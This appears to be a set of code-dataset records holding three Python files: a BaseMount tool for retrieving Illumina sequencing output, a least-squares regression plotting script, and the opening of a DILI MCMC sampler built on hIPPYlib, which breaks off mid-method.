sample_dict.items():\n logging.debug(f\"{sample_id}:\\t{reads}\")\n\n base_folders = ['Config',\n 'Data',\n 'Images',\n 'InterOp',\n 'Logs',\n 'Recipes',\n 'Thumbnail_Images']\n for run_id, file_list in samplesheet_dict.items():\n os.makedirs(outdir / run_id, exist_ok=True)\n shutil.copy(file_list[0], outdir / run_id / 'SampleSheet.csv')\n\n runinfo_out = outdir / run_id / 'RunInfo.xml'\n if not runinfo_out.exists():\n shutil.copy(file_list[1], runinfo_out)\n else:\n logging.debug(f\"Skipping {runinfo_out} (already exists)\")\n\n runparams_out = outdir / run_id / 'RunParameters.xml'\n if not runparams_out.exists():\n try:\n shutil.copy(file_list[2], runparams_out)\n except FileNotFoundError:\n logging.warning(\"WARNING: Could not find RunParameters.xml. Skipping.\")\n else:\n logging.debug(f\"Skipping {runparams_out} (already exists)\")\n\n # Make folder structure\n for f in base_folders:\n os.makedirs(outdir / run_id / f, exist_ok=True)\n\n read_folder = outdir / run_id / 'Data' / 'Intensities' / 'BaseCalls'\n os.makedirs(read_folder, exist_ok=True)\n\n df = read_samplesheet(file_list[0])\n sample_id_list = get_sample_id_list(df)\n for sample_id, reads in sample_dict.items():\n if sample_id in sample_id_list:\n shutil.move(reads[0], read_folder / reads[0].name)\n shutil.move(reads[1], read_folder / reads[1].name)\n\n # Copy all the log files over to the 'Logs' folder\n for verbose_run_name, log_list in logfile_dict.items():\n if run_translation_dict[verbose_run_name] == run_id:\n for logfile in logfile_dict[verbose_run_name]:\n outname = outdir / run_id / 'Logs' / logfile.name\n shutil.copy(src=logfile, dst=outname)\n os.chmod(str(outname), 0o775) # Fix permissions\n\n interop_folder_contents = retrieve_interop_contents(run_id=run_id, projectdir=projectdir)\n copy_interop_folder_contents(run_id=run_id, interop_folder_contents=interop_folder_contents, outdir=outdir)\n\n # Delete remnant .csv + .xml files\n if miseqsim:\n cleanup_csv = list(outdir.glob(\"*.csv\"))\n cleanup_xml = list(outdir.glob(\"*.xml\"))\n cleanup_list = cleanup_csv + cleanup_xml\n for f in cleanup_list:\n os.chmod(str(f), 0o775)\n os.remove(f)\n logging.info(f\"Process complete. Results available in {outdir}\")\n\n\ndef retrieve_samples(projectdir: Path, outdir: Path, miseqsim: bool):\n # Gather all BaseMount file paths\n fastq_list = list(projectdir.glob(\"Samples/*/Files/*\"))\n\n # Filter out hidden stuff, coerce to Path\n fastq_list = [Path(x) for x in fastq_list if \".id.\" not in str(x)]\n\n # Filter out duplicated samples. Primitive way of checking for \" (2)\" or \" (3)\". Definitely a better way to do this.\n fastq_list = [x for x in fastq_list if ' (' not in x.parents[1].name]\n\n # Try to search in another location for *.fastq.gz if files couldn't be located\n if len(fastq_list) == 0:\n fastq_list = list(projectdir.glob(\"AppSessions.v1/*/Sample*/Files/*\"))\n fastq_list = [Path(x) for x in fastq_list if \".id.\" not in str(x)]\n fastq_list = [x for x in fastq_list if ' (' not in x.parents[1].name]\n\n logging.info(f\"Detected {len(fastq_list)} FASTQ files\")\n\n # This list stores all files to be copied from Basemount to the outdir\n transfer_list = []\n\n # Check to see if files already exist in the outdir\n if not miseqsim:\n outdir_files = list(outdir.glob('*.fastq.gz'))\n else:\n outdir_files = list(outdir.glob('*/Data/Intensities/BaseCalls/*.fastq.gz'))\n\n # If the outdir is empty, we want to transfer all detected valid .fastq files\n if len(outdir_files) == 0:\n transfer_list = fastq_list\n\n for i in fastq_list:\n # Get name components of sample\n sampleid = i.parents[1].name\n samplename = i.name\n\n # Prepare outfile names, append BMH sample_id if it's not already in the filename\n if sampleid not in samplename:\n outname = outdir / Path(sampleid + \"_\" + samplename)\n else:\n outname = outdir / Path(samplename)\n\n # Skip files that already exist\n for j in outdir_files:\n if outname.name not in str(j):\n transfer_list.append(i)\n else:\n logging.debug(f\"Skipping {i.name} (already exists)\")\n\n # Begin copying files\n for i in sorted(set(transfer_list)):\n # Get name components of sample\n sampleid = i.parents[1].name\n samplename = i.name\n\n # Copy to outdir\n if sampleid not in samplename:\n outname = outdir / Path(sampleid + \"_\" + samplename)\n else:\n outname = outdir / Path(samplename)\n\n if miseqsim:\n outdir_file_names = [x.name for x in outdir_files]\n tmp_name = sampleid + '_' + i.name\n if tmp_name not in outdir_file_names:\n logging.info(f\"Copying {samplename}...\")\n try:\n shutil.copy(i, outname)\n os.chmod(str(outname), 0o775)\n except IsADirectoryError:\n logging.warning(f\"WARNING: Could not copy {i} because it's a directory\")\n else:\n if outname.exists():\n logging.debug(f\"Skipping {outname.name} (already exists)\")\n else:\n logging.info(f\"Copying {samplename}...\")\n shutil.copy(i, outname) # shutil.copy is filesystem agnostic, unlike shutil.move, os.rename\n os.chmod(str(outname), 0o775) # Fix permissions\n\n\ndef retrieve_logfile_dict(projectdir: Path) -> dict:\n run_folders = get_run_folders(projectdir)\n log_dict = dict()\n for verbose_run_name in run_folders:\n logfiles = list(verbose_run_name.glob('Logs/*'))\n logfiles = [Path(x) for x in logfiles if not Path(x).name.startswith(\".\")]\n log_dict[verbose_run_name.name] = logfiles\n return log_dict\n\n\ndef retrieve_run_files(projectdir: Path, outdir: Path) -> tuple:\n \"\"\"\n Returns two dictionaries due to a poor design decision. TODO: Make this whole thing less sloppy\n :param projectdir:\n :param outdir:\n :return:\n \"\"\"\n # Locate samplesheets\n samplesheets = list(projectdir.glob('AppSessions.v1/*/Properties/Input.sample-sheet'))\n samplesheets = [Path(x) for x in samplesheets if \".id.\" not in str(x)]\n\n logging.debug(f\"Found {len(samplesheets)} samplesheets\")\n if len(samplesheets) == 0:\n logging.error('ERROR: Could not find samplesheets for project. Quitting.')\n quit()\n\n # Copy samplesheets into outdir\n samplesheet_dict = dict()\n run_translation_dict = dict()\n for samplesheet in samplesheets:\n verbose_run_name = samplesheet.parents[1].name\n samplesheet_outname = outdir / (verbose_run_name + '.' + 'SampleSheet.csv')\n runxml_outname = outdir / (verbose_run_name + '.' + 'RunInfo.xml')\n runparametersxml_outname = outdir / (verbose_run_name + '.' + 'RunParameters.xml')\n runinfoxml = samplesheet.parent / 'Input.Runs' / '0' / 'Files' / 'RunInfo.xml'\n runparametersxml = samplesheet.parent / 'Input.Runs' / '0' / 'Files' / 'RunParameters.xml'\n\n logging.info(f'Copying SampleSheet.csv for {samplesheet.parents[1].name} to {samplesheet_outname}')\n shutil.copy(str(samplesheet), str(samplesheet_outname))\n os.chmod(str(samplesheet_outname), 0o775)\n\n breakout = False\n if not runxml_outname.exists():\n logging.info(f'Copying RunInfo.xml for {runinfoxml} to {runxml_outname}...')\n try:\n shutil.copy(str(runinfoxml), str(runxml_outname))\n os.chmod(str(runxml_outname), 0o775)\n except FileNotFoundError as e:\n logging.warning(\"WARNING: Couldn't find RunInfo.xml in the expected location. Trying again...\")\n logging.error(f\"TRACEBACK: {e}\")\n try:\n runinfoxml = samplesheet.parents[1] / 'Logs' / 'RunInfo.xml'\n shutil.copy(str(runinfoxml), str(runxml_outname))\n os.chmod(str(runxml_outname), 0o775)\n except FileNotFoundError:\n logging.warning(f\"WARNING: {verbose_run_name} is missing critical files and will be skipped\")\n breakout = True\n else:\n logging.debug(f\"Skipping {runxml_outname} (already exists)\")\n\n if breakout:\n break\n\n if not runparametersxml_outname.exists():\n try:\n logging.info(f'Copying RunParameters.xml for {runparametersxml} to {runparametersxml_outname}...')\n shutil.copy(str(runparametersxml), str(runparametersxml_outname))\n os.chmod(str(runparametersxml_outname), 0o775)\n except FileNotFoundError:\n # TODO: Figure out if this file can be retrieved from somewhere else\n logging.warning(f\"WARNING: Could not find RunParameters.xml for {verbose_run_name}. Skipping.\")\n else:\n logging.debug(f\"Skipping {runparametersxml_outname} (already exists)\")\n\n run_id = extract_run_name(samplesheet=samplesheet)\n run_translation_dict[verbose_run_name] = run_id\n samplesheet_dict[run_id] = [samplesheet_outname, runxml_outname, runparametersxml_outname]\n\n return samplesheet_dict, run_translation_dict\n\n\ndef get_run_folders(projectdir: Path) -> list:\n runfolders = list(projectdir.glob('AppSessions.v1/*'))\n runfolders = [Path(x) for x in runfolders if not Path(x).name.startswith(\".\")]\n return runfolders\n\n\ndef read_samplesheet(samplesheet: Path) -> pd.DataFrame:\n \"\"\"\n Reads SampleSheet.csv and returns dataframe (all header information will be stripped)\n :param samplesheet: Path to SampleSheet.csv\n :return: pandas df of SampleSheet.csv with head section stripped away\n \"\"\"\n counter = 1\n with open(str(samplesheet)) as f:\n for line in f:\n if '[Data]' in line:\n break\n else:\n counter += 1\n df = pd.read_csv(samplesheet, sep=\",\", index_col=False, skiprows=counter)\n return df\n\n\ndef validate_samplesheet_header(header: list) -> bool:\n \"\"\"\n Validates that column names match expected values\n :param header: List of column names\n :return: True if header meets all expected values, False if not\n \"\"\"\n expected_header = [\n 'Sample_ID',\n 'Sample_Name',\n 'Sample_Plate',\n 'Sample_Well',\n 'I7_Index_ID',\n 'index',\n 'I5_Index_ID',\n 'index2',\n 'Sample_Project',\n 'Description'\n ]\n if not set(header) == set(expected_header):\n raise Exception(f\"Provided header {header} does not match expected header {expected_header}\")\n else:\n return True\n\n\ndef get_sample_id_list(samplesheet_df: pd.DataFrame) -> list:\n \"\"\"\n Returns list of all SampleIDs in SampleSheet dataframe\n :param samplesheet_df: df returned from read_samplesheet()\n :return: list of all Sample IDs\n \"\"\"\n sample_id_list = list(samplesheet_df['Sample_ID'])\n return sample_id_list\n\n\ndef group_by_project(samplesheet_df: pd.DataFrame) -> dict:\n \"\"\"\n Groups samples by project extracted from SampleSheet.csv.\n :param samplesheet_df: df returned from read_samplesheet()\n :return: project dictionary (Keys are project names, values are lists of associated samples)\n \"\"\"\n project_list = list(samplesheet_df.groupby(['Sample_Project']).groups.keys())\n project_dict = {}\n for project in project_list:\n project_dict[project] = list(samplesheet_df[samplesheet_df['Sample_Project'] == project]['Sample_ID'])\n return project_dict\n\n\ndef retrieve_interop_contents(run_id: str, projectdir: Path):\n try:\n interop_folder = projectdir.parents[1] / 'Runs' / run_id / 'Files' / 'InterOp'\n except Exception as e:\n logging.error(\"ERROR: Couldn't retrieve InterOp contents.\")\n logging.error(f\"TRACEBACK: {e}\")\n return\n\n interop_folder_contents = list(interop_folder.glob(\"*\"))\n return interop_folder_contents\n\n\ndef copy_interop_folder_contents(run_id: str, interop_folder_contents: list, outdir: Path):\n logging.info(f\"Copying InterOp folder contents for {run_id}...\")\n for f in interop_folder_contents:\n outname = outdir / run_id / 'InterOp' / f.name\n if outname.exists():\n logging.debug(f\"Skipping {outname.name} for {run_id} (already exists)\")\n elif not f.is_dir() and f.is_file():\n logging.info(f\"Copying {f}...\")\n shutil.copy(src=f, dst=outname)\n try:\n os.chmod(str(outname), 0o775)\n except PermissionError as e:\n logging.error(f\"ERROR: Could not change permissions for {outname}\")\n logging.error(f\"TRACEBACK: {e}\")\n else:\n logging.debug(f\"Skipping {f}\")\n\n\ndef extract_run_name(samplesheet: Path) -> str:\n \"\"\"\n Retrieves the 'Experiment Name' from SampleSheet.csv\n :param samplesheet: Path to SampleSheet.csv\n :return: value of 'Experiment Name'\n \"\"\"\n with open(str(samplesheet)) as f:\n for line in f:\n if 'Experiment Name' in line:\n experiment_name = line.split(',')[1].strip()\n logging.debug(f\"Detected the following experiment name: {experiment_name}\")\n return experiment_name\n else:\n raise Exception(f\"Could not find 'Experiment Name' in {samplesheet}\")\n\n\ndef retrieve_fastqgz(directory: Path) -> [Path]:\n \"\"\"\n :param directory: Path to folder containing output from MiSeq run\n :return: LIST of all .fastq.gz files in directory\n \"\"\"\n fastq_file_list = list(directory.glob(\"*.f*q*\"))\n return fastq_file_list\n\n\ndef retrieve_sampleids(fastq_file_list: [Path]) -> list:\n \"\"\"\n :param fastq_file_list: List of fastq.gz filepaths generated by retrieve_fastqgz()\n :return: List of Sample IDs\n \"\"\"\n # Iterate through all of the fastq files and grab the sampleID, append to list\n sample_id_list = list()\n for f in fastq_file_list:\n sample_id = f.name.split('_')[0]\n sample_id_list.append(sample_id)\n\n # Get unique sample IDs\n sample_id_list = list(set(sample_id_list))\n return sample_id_list\n\n\ndef get_readpair(sample_id: str, fastq_file_list: [Path], forward_id: str = \"_R1\", reverse_id: str = \"_R2\") -> (list,\n None):\n \"\"\"\n :param sample_id: String of sample ID\n :param fastq_file_list: List of fastq.gz file paths generated by retrieve_fastqgz()\n :param forward_id: ID indicating forward read in filename (e.g. _R1)\n :param reverse_id: ID indicating reverse read in filename (e.g. _R2)\n :return: the absolute filepaths of R1 and R2 for a given sample ID\n \"\"\"\n\n r1, r2 = None, None\n for f in fastq_file_list:\n if sample_id in f.name:\n if forward_id in f.name:\n r1 = f\n elif reverse_id in f.name:\n r2 = f\n if r1 is not None and r2 is not None:\n return [r1, r2]\n else:\n logging.warning('WARNING: Could not pair {}'.format(sample_id))\n return None\n\n\ndef populate_sample_dictionary(sample_id_list: list, fastq_file_list: [Path]) -> dict:\n \"\"\"\n :param sample_id_list: List of unique Sample IDs generated by retrieve_sampleids()\n :param fastq_file_list: List of fastq.gz file paths generated by retrieve_fastqgz()\n :return: dictionary with each Sample ID as a key and the read pairs as values\n \"\"\"\n # Find file pairs for each unique sample ID\n sample_dictionary = {}\n for sample_id in sample_id_list:\n read_pair = get_readpair(sample_id, fastq_file_list)\n if read_pair is not None:\n sample_dictionary[sample_id] = read_pair\n else:\n pass\n return sample_dictionary\n\n\ndef get_sample_dictionary(directory: Path) -> dict:\n \"\"\"\n Creates a sample dictionary with unique/valid sample IDs as keys and paths to forward and reverse reads as values\n :param directory: Path to a directory containing .fastq.gz files\n :return: Validated sample dictionary with sample_ID:R1,R2 structure\n \"\"\"\n fastq_file_list = retrieve_fastqgz(directory)\n sample_id_list = retrieve_sampleids(fastq_file_list)\n sample_dictionary = populate_sample_dictionary(sample_id_list, fastq_file_list)\n if len(sample_dictionary) > 0:\n logging.info(f\"Successfully paired {len(sample_dictionary)} of {len(sample_id_list)} samples\")\n return sample_dictionary\n\n\nif __name__ == \"__main__\":\n cli()\n","sub_path":"BaseMountRetrieve/basemountretrieve.py","file_name":"basemountretrieve.py","file_ext":"py","file_size_in_byte":20557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"611464695","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n最小二乘法直接计算方式\r\n在实践中, β0。和β1 都是未知的。所以在用式(3. 1) 做出预测之前,我们必须根据数据集\r\n估计系数。令\r\n(x1, y1),(x2, y2),(x3, y3),...,(xn, yn)\r\n\r\n\"\"\"\r\nfrom numpy import *\r\nimport numpy as np \r\nimport operator\r\nimport matplotlib.pyplot as plt \r\n\r\ndef loadDataSet(fileName): \r\n X = []; Y = []\r\n fr = open(fileName)\r\n for line in fr.readlines():\r\n curLine = line.strip().split('\\t')\r\n X.append(float(curLine[0])); Y.append(float(curLine[-1]))\r\n return X,Y\r\n\r\n#绘制散点\r\ndef plotscatter(Xmat,Ymat,plt):\r\n\t# fig=plt.subplot()\r\n\t# fig = plt.figure()\r\n\tax = plt.subplot(2,1,1)\r\n\t# ax = fig.add_subplot(111) # 绘制图形位置\r\n\tplt.plot(Xmat,Ymat, 'go' ,markersize=2)\t# 绘制散点图\r\n\r\n\r\ndef plotLine(Xmat,yhat,plt):\r\n\tplt.plot(Xmat,yhat,'r') # 绘制回归线\r\n\r\n#根据回归的系数计算预测值\r\ndef cal(Xmat,Ymat,a,b):\r\n\tx=Xmat\r\n\t# x.sort() # 对Xmat各元素进行排序\r\n\tyhat = [a*float(xi)+b for xi in x] # 计算预测值\r\n\treturn yhat\r\n\r\n#拟合\r\ndef leastSquare(Xmat, Ymat):\r\n\tmeanX = mean(Xmat) # 原始数据集的均值\r\n\tmeanY = mean(Ymat)\r\n\r\n\tdX = Xmat-meanX # 各元素与均值的差\r\n\tdY = Ymat-meanY\r\n\r\n\tsumXY = vdot(dX,dY) # 返回两个向量的点乘 multiply\r\n\tSqX = sum(power(dX,2)) # 向量的平方:(X-meanX)^2\r\n\r\n\t# 计算斜率和截距\r\n\ta = sumXY/SqX\r\n\tb = meanY - a*meanX\r\n\treturn a,b\r\n\r\n\r\n\r\n#yArr and yHatArr both need to be arrays\r\ndef rssError(yArr,yHatArr):\r\n\treturn ((yArr-yHatArr)**2).sum()\r\n\r\n#拟合一个变量\r\ndef leastSquareDedail(Xmat, Ymat):\r\n\tmeanX = mean(Xmat) # 原始数据集的均值\r\n\tmeanY = mean(Ymat)\r\n\r\n\tdX = Xmat-meanX # 各元素与均值的差\r\n\tdY = Ymat-meanY\r\n\t# m,n=shape(Xmat)\r\n\tws =[]\r\n\t# 手工计算:\r\n\tsumXY = 0; SqX = 0\r\n\tfor i in xrange(len(dX)):\r\n\t\tsumXY += double(dX[i])*double(dY[i])\r\n\t\tSqX += double(dX[i])**2\r\n\t\tws.append(SqX)\r\n\r\n\t# 计算斜率和截距\r\n\ta = sumXY/SqX\r\n\tb = meanY - a*meanX\r\n\treturn a,b\r\n\r\ndef pltDot(xDot,yDot,rg,plt):\r\n\tax = plt.subplot(2,1,2)\r\n\tplt.tight_layout(pad=0.4, w_pad=0.5, h_pad=1.0)\r\n\tplt.plot(xDot, yDot, 'ro',markersize=5)\r\n\tplt.axis(rg)\r\n\r\ndef plt3d(X, Y, Z):\r\n\tfrom mpl_toolkits.mplot3d import Axes3D\r\n\tfig = plt.figure(1)\r\n\r\n\tax = Axes3D(fig)\r\n\r\n\r\n\tax.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap=plt.cm.hot)\r\n\tax.contourf(X, Y, Z, zdir='z', offset=-2, cmap=plt.cm.hot)\r\n\tax.set_zlim(-2,2)\r\n\r\n# 数据文件名\r\nXmat, Ymat= loadDataSet(\"D:/DevN/sample-data/zhengjie-data/chapter07/regdataset.txt\")\r\nplt.figure(figsize=(10, 8))\r\na,b=leastSquare(Xmat, Ymat)\r\nyhat=cal(Xmat,Ymat,a,b)\r\n\r\n#详细拟合过程\r\nleastSquareDedail(Xmat, Ymat)\r\n\r\n# 绘制图形\r\nplotscatter(Xmat,Ymat,plt)\r\nplotLine(Xmat,yhat,plt)\r\nxDot=[1,2,3,4]\r\nyDot=[1,4,9,16]\r\n\r\nrg=[0, max(xDot)+1,0, max(yDot)+1]\r\npltDot(xDot,yDot,rg,plt)\r\n\r\nplt.show()","sub_path":"core.framework.datamining.pyscript/evaluation/linear_regression/line_regression.py","file_name":"line_regression.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"460555476","text":"#!/usr/bin/env python\n\"\"\"\nDimension-independent likelihood-informed (DILI) MCMC\nby Tiangang Cui, Kody J.H. Law, and Youssef M. Marzouk\nhttp://www.sciencedirect.com/science/article/pii/S0021999115006701\n------------------------------------------------------------------\ntailored to using hIPPYlib library https://hippylib.github.io\n-------------------------\nCreated March 29, 2017\n\"\"\"\n__author__ = \"Shiwei Lan\"\n__copyright__ = \"Copyright 2017, The EQUiPS projects\"\n__license__ = \"GPL\"\n__version__ = \"0.9\"\n__maintainer__ = \"Shiwei Lan\"\n__email__ = \"slan@caltech.edu; lanzithinking@outlook.com\"\n\nimport dolfin as dl\nimport numpy as np\nimport scipy as sp\nimport scipy.sparse as sps\nimport scipy.sparse.linalg\nimport timeit,time\nimport sys\nsys.path.append( \"../\" )\n# from util import Eigen,wtQR\n\nfrom ..modeling.variables import STATE, PARAMETER\nfrom ..utils.vector2function import vector2Function\nfrom ..algorithms.multivector import MultiVector, MvDSmatMult\nfrom ..algorithms.randomizedEigensolver import doublePassG\nfrom ..utils.random import Random\nfrom .geometry import Geometry\n\nfrom ..mcmc.tracers import NullTracer\nfrom ..mcmc.chain import NullQoi\n\n# def CholQR(Y,W):\n# \"\"\"\n# CholQR with W-inner products\n# ----------------------------\n# Arvind K. Saibaba, Jonghyun Lee, Peter K. Kitanidis,\n# Randomized algorithms for Generalized Hermitian Eigenvalue Problems with application to computing Karhunen-Loeve expansion,\n# Numerical Linear Algebra with Applications 23 (2), pp. 314-339.\n# \"\"\"\n# Z=W.dot(Y) if type(W) is np.ndarray else np.array([W(r) for r in Y.T]).T\n# C=Y.T.dot(Z)\n# L=np.linalg.cholesky(C)\n# Q=np.linalg.solve(L,Y.T).T\n# return Q,L.T\n\nclass DILI:\n \"\"\"\n Dimension-independent likelihood-informed (DILI) MCMC by Tiangang Cui, Kody J.H. Law, and Youssef M. Marzouk\n http://www.sciencedirect.com/science/article/pii/S0021999115006701\n ------------------------------------------------------------------\n The main purpose is to speed up the mixing of dimension-independent MCMC defined on function (Hilbert) space.\n The key idea is to find likelihood-informed (low dimensional) subspace (LIS) using prior pre-conditioned Gauss-Newton approximation of Hessian (ppGNH) averaged wrt. posterior samples;\n and apply more sophisticated/expensive methods (Langevin) in LIS and explore the complement subspace (CS) with more efficient/cheap methods like pCN.\n ------------------------------------------------------------------\n After the class is instantiated with arguments, call adaptive_MCMC to collect MCMC samples which will be stored in 'result' folder.\n \"\"\"\n def __init__(self,parameter_init,model,step_size,proposal='LI_Langevin',adpt_h=False,**kwargs):\n \"\"\"\n Initialize DILI MCMC instance with parameter, function providing geometric information, step size and proposal method:\n v : whitened parameter (vector) to sample\n model : model to provide geometric information including log-density (likelihood), its gradient and Hessian (or Fisher) etc.\n Xi_m,Theta_m : accumulated LIS basis-- eigenvalues and eigenvectors (eigenfunctions)\n Xi_r,Theta_r : global LIS basis\n d_F,treshhold_LIS : Forstner distance between two covariances to diagnose the convergence of LIS if it drops below treshhold_LIS\n Sigma_r : posterior covariance projected to LIS, estimated from empirical projected samples\n emp_mean : empirical mean of parameter\n h : step size(s) of MCMC\n n_lag,n_max : interval/maximum number of updating LIS\n n_b : interval to update the projected (low-rank) posterior covariance approximation\n proposal : option for proposal in MCMC\n adpt_h : indicator to adapt step size(s)\n \"\"\"\n # parameter\n self.v=parameter_init\n self.dim=parameter_init.size()\n # model\n self.model=model\n \n # sampling setting\n self.h=np.array(step_size)\n self.n_lag=kwargs.pop('n_lag',200)\n self.n_max=kwargs.pop('n_max',1000)\n self.n_b=kwargs.pop('n_b',50)\n self.threshold_LIS=kwargs.pop('threshold_LIS',1e-5)\n \n target_acpt=kwargs.pop('target_acpt',0.65)\n # geometry needed\n self.kwargs=kwargs\n self.geom = Geometry(model)\n # self.geom=lambda parameter,geom_ord=[0],**kwargs: [kwargs.update(self.kwargs), self.model.get_geom(parameter,geom_ord=geom_ord,whitened=True,**kwargs)][1]\n self.loglik,self.gradlik,_,self.eigs=self.geom.get_geom(self.v,geom_ord=[0,1,1.5],thld=0.01)\n \n # LIS basis\n self.update_LIS_m=0\n self.Xi_m,self.Theta_m=self.eigs # local\n self.dim_LIS_l=self.Xi_m.size\n self.Xi_r,self.Theta_r=self.eigs # global\n self.dim_LIS_g=self.Xi_r.size\n print('Initial local/global LIS has %d dimensions.' % self.dim_LIS_l)\n self.d_F=np.inf # Forstner distance to detect convergence of LIS\n # (empirical estimate of) projected posterior covariance\n self.Sigma_r=1e-2*np.eye(self.dim_LIS_g)\n# self.Sigma_r=np.zeros((self.dim_LIS_g,self.dim_LIS_g))\n # empirical mean of parameter vector\n self.rk1update_empCOV_n=0\n self.emp_mean = self.model.generate_vector(PARAMETER)\n self.emp_mean.axpy(1.0, self.v)\n # self.emp_mean=dl.Vector(self.v)\n # initialize re-weighted basis\n self.update_COV()\n\n # operators\n self.proposal=proposal\n self.form_operators()\n \n # optional setting for adapting step size\n self.adpt_h=adpt_h\n if self.adpt_h:\n h_adpt={}\n# h_adpt['h']=self._init_h()\n h_adpt['h']=self.h\n h_adpt['mu']=np.log(10*h_adpt['h'])\n h_adpt['loghn']=0.\n h_adpt['An']=0.\n h_adpt['gamma']=0.05\n h_adpt['n0']=10\n h_adpt['kappa']=0.75\n h_adpt['a0']=target_acpt\n self.h_adpt=h_adpt\n\n def _operator(self,x,y,mv=None,D=None,d=0,M=None):\n \"\"\"\n Helper function to define operators A, B, and G\n \"\"\"\n if mv is None:\n mv=self.Psi_r\n if D is None:\n D=self.D_r\n if M is None:\n M=self.model.prior.M_PETScMatrix\n \n# y_mv=MultiVector(mv[0],1)\n# MvDSmatMult(mv,((D-d)*mv.dot_v(M*x))[:,None],y_mv)\n# y[:]=y_mv[0]\n y.zero()\n# mv.reduce(y,(D-d)*mv.dot_v(M*x)) # works with single process but has unexpected error in multi-process running\n Dmvx=(D-d)*mv.dot_v(M*x)\n for j in range(mv.nvec()):\n y.axpy(Dmvx[j],mv[j])\n if d:\n y.axpy(d,x)\n \n def form_operators(self):\n \"\"\"\n Form operators A, B, and G induced by reweighted LIS basis\n Input: Psi_r, D_r, h\n Output: D_Ar, D_Br, D_Gr, A, B, G\n \"\"\"\n # on LIS\n if self.proposal is 'LI_prior':\n self.D_Ar=(2-self.h[0]*self.D_r)/(2+self.h[0]*self.D_r)\n self.D_Br=np.sqrt(1-self.D_Ar**2)\n self.D_Gr=np.zeros_like(self.D_r)\n elif self.proposal is 'LI_Langevin':\n self.D_Ar=1-self.h[0]*self.D_r\n self.D_Br=np.sqrt(2*self.h[0]*self.D_r)\n self.D_Gr=self.h[0]*self.D_r\n else:\n if self.parameters['print_level'] > 0:\n print('Wrong proposal!')\n raise\n # on the complement space\n a_perp=(2-self.h[1])/(2+self.h[1])\n b_perp=np.sqrt(1-a_perp**2)\n # operators\n self.A=lambda x,y:self._operator(x,y,D=self.D_Ar,d=a_perp)\n self.B=lambda x,y:self._operator(x,y,D=self.D_Br,d=b_perp)\n self.G=lambda x,y:self._operator(x,y,D=self.D_Gr,d=0,M=1.) # G only applies to an assembled gradient\n \n def update_LIS(self,threshold_l=.01,threshold_s=1e-4,threshold_g=.01):\n \"\"\"\n Algorithm 1: Incremental update of the expected GNH and global LIS.\n Input: Theta_m, Xi_m, v_m1\n Output: Theta_m1, Xi_m1, Theta_r, Xi_r\n \"\"\"\n # count the number of calls\n self.update_LIS_m+=1\n m=self.update_LIS_m\n # Compute the local LIS basis\n _,_,_,eigs=self.geom.get_geom(self.v,geom_ord=[1.5],thld=threshold_l)\n Lambda_m1,Phi_m1=eigs\n self.dim_LIS_l=Lambda_m1.size\n # Compute the QR decomposition\n# Q,R=np.linalg.qr(np.hstack([self.Theta_m,Phi_m1]))\n# Q,R=wtQR.CholQR(np.hstack([self.Theta_m,Phi_m1]),lambda x:self.model.prior.M_PETScMatrix*x) # QR decomposition in weighted space R_M\n Theta_m1=MultiVector(self.v,len(self.Xi_m)+self.dim_LIS_l)\n for i in range(len(self.Xi_m)):\n Theta_m1[i][:]=self.Theta_m[i]\n for i in range(self.dim_LIS_l):\n Theta_m1[len(self.Xi_m)+i][:]=Phi_m1[i]\n Q=MultiVector(Theta_m1)\n _,R=Q.Borthogonalize(self.model.prior.M_PETScMatrix)\n # Compute the new eigenvalues through the eigendecomposition\n eig_aug=np.hstack([m*self.Xi_m,Lambda_m1])\n mat_aug=(R*eig_aug).dot(R.T)/(m+1)\n# k=min([eig_aug.shape[0],mat_aug.shape[0]-1])\n# Xi_m1,W=sps.linalg.eigsh(mat_aug,k=k)\n Xi_m1,W=np.linalg.eigh(mat_aug)\n dsc_ord = Xi_m1.argsort()[::-1]\n Xi_m1 = Xi_m1[dsc_ord]; W = W[:,dsc_ord]\n # Compute the new basis\n# Theta_m1=Q.dot(W)\n MvDSmatMult(Q,W,Theta_m1)\n # truncate eigenvalues for updated LIS\n idx_s=Xi_m1>=threshold_s\n self.Theta_m=MultiVector(self.v,sum(idx_s))\n for i,j in enumerate(np.where(idx_s)[0]):\n self.Theta_m[i][:]=Theta_m1[j]\n self.Xi_m=Xi_m1[idx_s]\n # truncate eigenvalues for global LIS to return\n idx_g=Xi_m1>=threshold_g\n self.Theta_r=MultiVector(self.v,sum(idx_g))\n for i,j in enumerate(np.where(idx_g)[0]):\n self.Theta_r[i][:]=Theta_m1[j]\n self.Xi_r=Xi_m1[idx_g]\n self.dim_LIS_g=self.Xi_r.size\n# return self.Theta_r,self.Xi_r\n \n def rk1update_empCOV(self):\n \"\"\"\n Perform rank-1 update of the empirical (projected) covariance.\n ns^2(X_n1) = (n-1)s^2(X_n) + (1-1/(n+1)) * [_X_n;x]' * [1,-1;-1,1] * [_X_n;x],\n X_n1=[X_n;x], _X_n=mean(X_n), s^2(.)=sample covariance (std if 1d)\n Input: _X_n, s^2(X_n), x\n Output: s^2(X_n1)\n \"\"\"\n # count the number of calls\n self.rk1update_empCOV_n+=1\n n=self.rk1update_empCOV_n\n # projected vector\n# proj_v=self.Theta_r.T.dot(self.v)\n# rk1_v=np.vstack([self.emp_mean,proj_v])\n# rk1_v=np.vstack([self.emp_mean,self.v]).dot(self.Theta_r)\n rk1_v=np.array([self.Theta_r.dot_v(self.model.prior.M_PETScMatrix*r) for r in [self.emp_mean,self.v]])\n\n # rank-1 update of empirical covariance\n rk1_update=(1-1/np.float(n+1))*rk1_v.T.dot(np.array([[1,-1],[-1,1]])).dot(rk1_v)\n self.Sigma_r=((n-1)*self.Sigma_r+rk1_update)/n\n # update empirical mean\n# self.emp_mean=(n*self.emp_mean+proj_v)/(n+1)\n self.emp_mean*=np.float_(n)/(n+1)\n self.emp_mean.axpy(1.0/(n+1),self.v)\n \n def update_COV(self):\n \"\"\"\n Algorithm 2: Update of the low-rank posterior covariance approximation.\n Input: Theta_r, Sigma_r\n Output: Psi_r, D_r\n \"\"\"\n # Compute eigendecomposition\n self.D_r,W_r=np.linalg.eigh(self.Sigma_r)\n self.D_r=self.D_r[::-1]; W_r=W_r[:,::-1]\n if any(self.D_r<0):\n# if self.parameters['print_level'] > 0:\n# print('Ah-Oh--')\n self.D_r[abs(self.D_r)<1e-8] = abs(self.D_r[abs(self.D_r)<1e-8])\n # Return the reweighted LIS basis and the diagonalized covariance\n 